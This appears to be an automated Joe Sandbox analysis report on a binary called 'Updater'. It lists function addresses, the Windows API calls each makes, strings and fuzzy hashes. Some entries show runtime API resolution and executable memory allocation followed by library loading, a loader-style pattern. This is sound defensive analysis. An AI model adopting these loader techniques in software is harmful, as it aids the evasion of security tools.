Opcode Fuzzy Hash: a0392e244d3812ea8b74426389afe98efbd20cde7fd38725ca71daecb1240008
Instruction Fuzzy Hash: A0110671240308BEEF215F79CC06FA73BA9EF85B54F114614FE56E21A0D675DC119B24

Function 006E514D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

DeleteObject.GDI32(?), ref: 006E5182
DestroyWindow.USER32(?,006E3A41,?,?,?,?,?,006E3992,?,?), ref: 006E51DF

Strings

(z, xrefs: 006E5157
(z, xrefs: 00728D1C

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: DeleteDestroyObjectWindow
String ID: (z$(z
API String ID: 2587070983-682947932
Opcode ID: 5c77ec3447c4f99415649b2eeba59d4b386127ae32685f28a2de1c06be5789b9
Instruction ID: f513f06e1cd20379c829721514edef51eceed16259ef025dfd996a2637531ca5
Opcode Fuzzy Hash: 5c77ec3447c4f99415649b2eeba59d4b386127ae32685f28a2de1c06be5789b9
Instruction Fuzzy Hash: EF213A34702751CFDB58DB1EEC54B6633A2BB96705F00802CE4029B3A2DB2CAC46CB49

Function 00768B3E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,007A3FE0,007A4024), ref: 00768B8B
CloseHandle.KERNEL32 ref: 00768B9D

Strings

$@z, xrefs: 00768B56
?z, xrefs: 00768B47

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: $@z$?z
API String ID: 3712363035-246488118
Opcode ID: 2859565c443a420ded22223098645cd34a0b4c15758ab580222cf93d3bf79ab3
Instruction ID: f178cec8dd8b3a3c1bf5281faa00e406cf4e098df13233dc08e0ff1c99288e5d
Opcode Fuzzy Hash: 2859565c443a420ded22223098645cd34a0b4c15758ab580222cf93d3bf79ab3
Instruction Fuzzy Hash: 4EF054F1A50314BEE3105B66AC06F773A5CEB86354F004524FB09D6191D7BA4D1097AD

Function 014B7035 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,014B7A70,0000001C,?,014B70B5,0000001C), ref: 014B7054
GetProcAddress.KERNEL32(00000000,VirtualQueryEx), ref: 014B7061

Strings

VirtualQueryEx, xrefs: 014B705B
kernel32.dll, xrefs: 014B704F

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: VirtualQueryEx$kernel32.dll
API String ID: 1646373207-930368515
Opcode ID: f6cdf2d9ef2cb6f5591a6ce25c7fc8719c3fc6485d492b115c79f821e8a38b58
Instruction ID: f6c5bc79e5beee4af72527d478a072cf54884e586907d241bb841ce89e7e79c1
Opcode Fuzzy Hash: f6cdf2d9ef2cb6f5591a6ce25c7fc8719c3fc6485d492b115c79f821e8a38b58
Instruction Fuzzy Hash: 6AE02BB22052053AA310AAAA5C80CDFAB6CCED6530B70431FF564831B0D1300D05C270

Function 014B7041 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,014B7A70,0000001C,?,014B70B5,0000001C), ref: 014B7054
GetProcAddress.KERNEL32(00000000,VirtualQueryEx), ref: 014B7061

Strings

VirtualQueryEx, xrefs: 014B705B
kernel32.dll, xrefs: 014B704F

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: VirtualQueryEx$kernel32.dll
API String ID: 1646373207-930368515
Opcode ID: 7e622d7a9dba823348d0496e736476b37b6d7f4d3fcbe644bd145731f28b58ae
Instruction ID: 62dfd68eea777e308b3cb1cfd82ee0e72ab0a2ddc88baacfd861c093a718342d
Opcode Fuzzy Hash: 7e622d7a9dba823348d0496e736476b37b6d7f4d3fcbe644bd145731f28b58ae
Instruction Fuzzy Hash: 36E086F62052047E6300DADBAC81CEFB7ACCDD5960720812FF60483220D4705D0592B4

Function 014A85AD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,014A8F36,00000000,014A8F49), ref: 014A85B3
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 014A85C4

Strings

GetDiskFreeSpaceExA, xrefs: 014A85BE
kernel32.dll, xrefs: 014A85AE

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: a7528d4f39c84efab42d973cb7a30d2317bb3595cd31a6fe28eaa1a7d507fca2
Instruction ID: 976e256e328d603dc2a873980b059014b3d7a7adb1b4fa54f8bb266582a5ae63
Opcode Fuzzy Hash: a7528d4f39c84efab42d973cb7a30d2317bb3595cd31a6fe28eaa1a7d507fca2
Instruction Fuzzy Hash: 90D0A7F46843074BD311EEA65CC5A012588D378202FB2002F69D84B239DBF085109700

Function 014B5AE5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,014B5ED0), ref: 014B5AEE
GetProcAddress.KERNEL32(00000000,GlobalMemoryStatusEx), ref: 014B5AFB

Strings

kernel32.dll, xrefs: 014B5AE9
GlobalMemoryStatusEx, xrefs: 014B5AF5

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GlobalMemoryStatusEx$kernel32.dll
API String ID: 1646373207-2840702992
Opcode ID: 5eb39b0ecc1133e78a8742a51ee6ef5c3f6cadb0112210bea81ce3e4cead1526
Instruction ID: b2a43ae077bf21c6096629d5092cd7864dccbc29db5f299ab2d23aa72dc10d10
Opcode Fuzzy Hash: 5eb39b0ecc1133e78a8742a51ee6ef5c3f6cadb0112210bea81ce3e4cead1526
Instruction Fuzzy Hash: E4C09B5935522139610071F61CC1CFA854CCC7A455355045BB510D6121F7F44F1129F1

Function 0073111E Relevance: 6.3, APIs: 4, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c34c49362fdf9b3232478f78511a0b21016533878fb476a4524fa409a413c8f
Instruction ID: 9b900671c7278f181cc37bb4d1c098b3230826835682811aa3e71c850784480b
Opcode Fuzzy Hash: 4c34c49362fdf9b3232478f78511a0b21016533878fb476a4524fa409a413c8f
Instruction Fuzzy Hash: C5C1AE75A0020AEFEB14CF94C884EAEB7B5FF48714F508598E905EB252D735EE81CB90

Function 014B92DD Relevance: 6.2, APIs: 4, Instructions: 199libraryloadermemoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040), ref: 014B9372
LoadLibraryA.KERNEL32(?,00000000,00000000,00001000,00000040), ref: 014B9411
GetProcAddress.KERNEL32(00000000,?), ref: 014B9475
GetProcAddress.KERNEL32(00000000,?), ref: 014B948C

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: AddressProc$AllocLibraryLoadVirtual
String ID:
API String ID: 857568384-0
Opcode ID: 202abf8045bdd428976210b8593a39926d5f9ffb387e82c85ccce658c3f9579f
Instruction ID: bf6d372fb83fe3389df2c34f86af7400661ee2d5498414da44e0b783f741cdb8
Opcode Fuzzy Hash: 202abf8045bdd428976210b8593a39926d5f9ffb387e82c85ccce658c3f9579f
Instruction Fuzzy Hash: 3F8113B19042299FDB61CF18CC81BDAB7B5FF58314F0541E6EA48A7311D774AE918FA0

Function 007112C1 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 007113F0

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 734c5446cdace2c4936c7f383d1101bfbd8e7bea81f1d04fa837735ae351251e
Instruction ID: a69074ad26d27414835f8b1784ea5263cb28e12fa8f9788a201dbfbefff0d89c
Opcode Fuzzy Hash: 734c5446cdace2c4936c7f383d1101bfbd8e7bea81f1d04fa837735ae351251e
Instruction Fuzzy Hash: 63412A32A00211EBDB207ABD8C4A6FE3AE5EF41370F544315FB28DA5E2E67C48C15762

Function 00766C96 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(0141E6A0,?), ref: 00766D05
ScreenToClient.USER32(?,?), ref: 00766D38
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00766DA5

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: e94e8eeb0e3efc4143ffe22ed3e6ba96dd6a009084f9cf6fcef7d592492a0aa6
Instruction ID: dc44bae879cf8b4af56ad5932f9a286705d1be4ac035bcdb04547e2e20cf25a9
Opcode Fuzzy Hash: e94e8eeb0e3efc4143ffe22ed3e6ba96dd6a009084f9cf6fcef7d592492a0aa6
Instruction Fuzzy Hash: DA515075A00209EFCF24DF68C8809AE7BB6FF85720F608259FC569B290D735AD51CB90

Function 007526B2 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 007526D9
WSAGetLastError.WSOCK32 ref: 007526E7
#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00752766
WSAGetLastError.WSOCK32 ref: 00752770

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: ErrorLast$socket
String ID:
API String ID: 1881357543-0
Opcode ID: 1a1d600f38688530baf52392f70ac09b2b976a4f528c834ea8d1151f9eb7b26d
Instruction ID: c21a8ce8f00fea6ba7f9661fc7b377ce771742d7a48038e29bae220dd2374ef9
Opcode Fuzzy Hash: 1a1d600f38688530baf52392f70ac09b2b976a4f528c834ea8d1151f9eb7b26d
Instruction Fuzzy Hash: 6641D034A00200AFE760AF24C896F667B95AB18714F14C45DF91A8F3C3D6B6DD428B91

Function 0070B24F Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef1aefaca302cb8d4528bcdffea374875b255735bc607c3d1ab80d62882b3ab5
Instruction ID: 508a3521d3072d88caf945ff71bd089af1ccbde445f7102b8dc2f42be0740dc8
Opcode Fuzzy Hash: ef1aefaca302cb8d4528bcdffea374875b255735bc607c3d1ab80d62882b3ab5
Instruction Fuzzy Hash: 0D410B72A00704EFD724AF78CC45BAEBBE8EB88710F20472AF145DB6D1D7799A518790

Function 014AA3B9 Relevance: 6.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 014AA468
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 014AA484
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 014AA4FB
VariantClear.OLEAUT32(?), ref: 014AA524

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: ArraySafe$Bound$ClearIndexVariant
String ID:
API String ID: 920484758-0
Opcode ID: 45d0f3985057229b3475333d862641383efb44316ef2fb9ceb622db2627beb4c
Instruction ID: bb97968849c76c78cffdfa8a63044cc0a6d77e0681e4990eb34dc06b9bfe30dc
Opcode Fuzzy Hash: 45d0f3985057229b3475333d862641383efb44316ef2fb9ceb622db2627beb4c
Instruction Fuzzy Hash: 1241307590122E9FCB61DF59CC94AC9B3BCAF38214F5141EAE649A7321D631AF84CF50

Function 0070D6F3 Relevance: 6.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,71E85006,006F6C9C,00000000,00000000,006F8204,?,006F8204,?,00000001,006F6C9C,71E85006,00000001,006F8204,006F8204), ref: 0070D740
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0070D7C9
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0070D7DB
__freea.LIBCMT ref: 0070D7E4

Part of subcall function 0070282E: RtlAllocateHeap.NTDLL(00000000,?,00000001,?,006F0445,?,?,006DFA72,00000000,?,?,?,006D1188,?), ref: 00702860

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: 445311c93df1150da5e93f211395ba869d2177513ddd818c14a018fc104486a5
Instruction ID: 9247a8f64881a2dd2a594c2453003abc99be686fa6b8ebf5943e1eb77b616ad5
Opcode Fuzzy Hash: 445311c93df1150da5e93f211395ba869d2177513ddd818c14a018fc104486a5
Instruction Fuzzy Hash: 0A31AE32A0020AEBDB359FA4DC45EAE7BE5EB44314B144268FC05D7190EB39CD51CB90

Function 014A6EC5 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 014A6EE1
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 014A6F05
GetModuleFileNameA.KERNEL32(006D0000,?,00000105), ref: 014A6F20
LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 014A6FC4

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: f3df9f3c8c56184986313fbb48111223778abf5e5fb070e5abbcad62258fa1fc
Instruction ID: b9a006d07a7547baba8c3194a2e9a3a2eb0a31eae45a72f1065c59208e799447
Opcode Fuzzy Hash: f3df9f3c8c56184986313fbb48111223778abf5e5fb070e5abbcad62258fa1fc
Instruction Fuzzy Hash: D2413A74A0425D9FDB21DB69C880BDEBBFDAB38300F8540EAA508E7260D7759F848F51

Function 014A6EC3 Relevance: 6.1, APIs: 4, Instructions: 107COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 014A6EE1
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 014A6F05
GetModuleFileNameA.KERNEL32(006D0000,?,00000105), ref: 014A6F20
LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 014A6FC4

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: a364edad368c55601a10dd0b41eec1e98b081ad805054851d4a30ec5b8bd53d2
Instruction ID: ae65bb73402bcd487b1381ce311a40ab63f51c05d043d8f7799b036f661c3d10
Opcode Fuzzy Hash: a364edad368c55601a10dd0b41eec1e98b081ad805054851d4a30ec5b8bd53d2
Instruction Fuzzy Hash: DE411C74A0425D9FDB21DB69C884BDEBBFDAB38300F8540EAA508E7260D7759F848F51

Function 0076803B Relevance: 6.1, APIs: 4, Instructions: 103windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(01430A38,?), ref: 00768061
GetWindowRect.USER32(?,?), ref: 007680D7
PtInRect.USER32(?,?,00769573), ref: 007680E7
MessageBeep.USER32(00000000), ref: 00768153

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 0387edd96ef96498429a5e1f792d519566fc28fb15d56c29906adb16269f7af5
Instruction ID: 4a6c4a8e30253f44ce3937128d798448a73b2ecd250a8e5175f2c13469f2d637
Opcode Fuzzy Hash: 0387edd96ef96498429a5e1f792d519566fc28fb15d56c29906adb16269f7af5
Instruction Fuzzy Hash: 8041D330A0020CDFCB56CF58C884A69B7F5FF4A710F1482A9ED169B261CB38ED46CB41

Function 014A7FDD Relevance: 6.1, APIs: 4, Instructions: 97threadCOMMON

Download Yara Rule

APIs

GetStringTypeA.KERNEL32(00000C00,00000002,?,00000080,?), ref: 014A80D7
GetThreadLocale.KERNEL32 ref: 014A8007

Part of subcall function 014A7F65: GetCPInfo.KERNEL32(00000000,?), ref: 014A7F7E

Memory Dump Source

Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_149a000_Updater.jbxd

Similarity

API ID: InfoLocaleStringThreadType
String ID:
API String ID: 1505017576-0
Opcode ID: 8dfe4f7b342027b03b6098fe4a7348e828197967e80adbf0533d7783ed9741e5
Instruction ID: e52f93b0698e40e40e41dda15bc1bcb80fc58968ad5ff667ac3d6a71012d32b6
Opcode Fuzzy Hash: 8dfe4f7b342027b03b6098fe4a7348e828197967e80adbf0533d7783ed9741e5
Instruction Fuzzy Hash: 9A3107B154824A8FD730DF29E890B9B3BB9EB71305FC5406BD5848B3BAEF7588458361

Function 0073EDF0 Relevance: 6.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

Part of subcall function 006E2306: _wcslen.LIBCMT ref: 006E230B

_wcslen.LIBCMT ref: 0073EE26
_wcslen.LIBCMT ref: 0073EE3D
_wcslen.LIBCMT ref: 0073EE68
GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0073EE73

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: _wcslen$ExtentPoint32Text
String ID:
API String ID: 3763101759-0
Opcode ID: dbdda4d578de07c0c61b4562110e101f6fc17f3fee31d2e458a627d3362e40a1
Instruction ID: 4dc8b0b214a01ab41857e2ea402567c1a4afa0db44b6e7276d2e06775e615aa8
Opcode Fuzzy Hash: dbdda4d578de07c0c61b4562110e101f6fc17f3fee31d2e458a627d3362e40a1
Instruction Fuzzy Hash: D421E571D40218EFEB10EFA4D981B7EB7F9EF45750F144068E908EB282D6749E418BA5

Function 007303B2 Relevance: 6.1, APIs: 4, Instructions: 84windowCOMMON

Download Yara Rule

APIs

TranslateAcceleratorW.USER32(01430A38,00000000,?), ref: 00730422
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00730466

Part of subcall function 006E59E7: IsDialogMessageW.USER32(?,?), ref: 006E5A21

TranslateMessage.USER32(?), ref: 0073044B
DispatchMessageW.USER32(?), ref: 00730455

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: Message$Translate$AcceleratorDialogDispatchPeek
String ID:
API String ID: 1911789232-0
Opcode ID: a68b0b7ff08e6b2fb2e3cf4331e598c11fab3e18392c9dd70b14f741d5d9ce8e
Instruction ID: 1ac54a1def932f12f25a98be7f32f71e3a910e843258e799119ecbf97710c6ba
Opcode Fuzzy Hash: a68b0b7ff08e6b2fb2e3cf4331e598c11fab3e18392c9dd70b14f741d5d9ce8e
Instruction Fuzzy Hash: FA31F6709043828FFB31CB78D868BB637E8AB17304F108159E566C24A3E77C9985CB95

Function 0073E098 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(74DF3340,0076D934,74DF3340), ref: 0073E0D2
GetLastError.KERNEL32 ref: 0073E0E1
CreateDirectoryW.KERNEL32(74DF3340,00000000), ref: 0073E0F0
CreateDirectoryW.KERNEL32(74DF3340,00000000,00000000,000000FF,0076D934), ref: 0073E14D

Memory Dump Source

Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true

Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: f078cbd783844e110b78f78436cdbc24870d10e59d41ed2d93e3bad7369b404b
Instruction ID: e82f4d15e1ac015673fa0b59c8dfd752c8b0be17a471e133b3c654af29cc9052
Opcode Fuzzy Hash: f078cbd783844e110b78f78436cdbc24870d10e59d41ed2d93e3bad7369b404b
